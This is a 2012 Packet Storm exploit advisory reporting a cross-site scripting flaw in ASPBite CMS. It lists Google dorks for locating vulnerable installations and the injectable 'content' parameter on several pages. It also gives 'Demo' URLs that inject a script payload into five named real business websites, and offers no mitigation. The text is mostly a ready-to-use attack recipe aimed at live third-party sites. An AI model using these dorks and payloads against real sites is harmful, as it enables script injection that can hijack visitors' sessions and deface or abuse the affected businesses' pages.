ASPBite CMS Cross Site Scripting

2012-08-31T00:00:00
ID PACKETSTORM:116152
Type packetstorm
Reporter Mr.Cicili
Modified 2012-08-31T00:00:00

Description

                                        
                                            `-----------IN THE NAME OF Allah--------------  
Exploit : ASPBite CMS Content Management System Cross Site Scripting (XSS)  
Discovered By : Mr.Cicili  
CMS Download Page : http://aspbite.com  
Google Dork : "inurl:content= inurl:aspbite/categories/index.asp?intCatID=" Or   
"intext:Powered by ASPBite CMS Content Management System"  
Exploit :   
Put your Scripts here :   
aspbite/categories/index.asp?intCatID="Id"&content={XSS}  
aspbite/products/products.asp?intProductsID="id"&content={XSS}  
aspbite/categories/index.asp?content={XSS}  
Demo :   
http://www.cookgroupltd.co.uk/aspbite/categories/index.asp?intCatID=66&content=<IMG """><SCRIPT>alert("XSS")</SCRIPT>">  
http://www.prsmanchester.co.uk//aspbite/categories/index.asp?content=<IMG """><SCRIPT>alert("XSS")</SCRIPT>">  
http://condensationproducts.co.uk/aspbite/products/products.asp?intProductsID=84&content=<IMG """><SCRIPT>alert("XSS")</SCRIPT>">  
http://www.yorkshiredampcourse.co.uk/aspbite/categories/index.asp?intCatId=68&content=<IMG """><SCRIPT>alert("XSS")</SCRIPT>">  
http://www.propertypreservationsystems.co.uk/aspbite/categories/index.asp?intCatID=52&content=<IMG """><SCRIPT>alert("XSS")</SCRIPT>">  
  
Tnx : M.R.S.CO - black.king - b3hz4d - skote_vahshat - IrIsT - G3n3Rall  
4ut0n0m0us - SpooferNinja - Nafsh   
`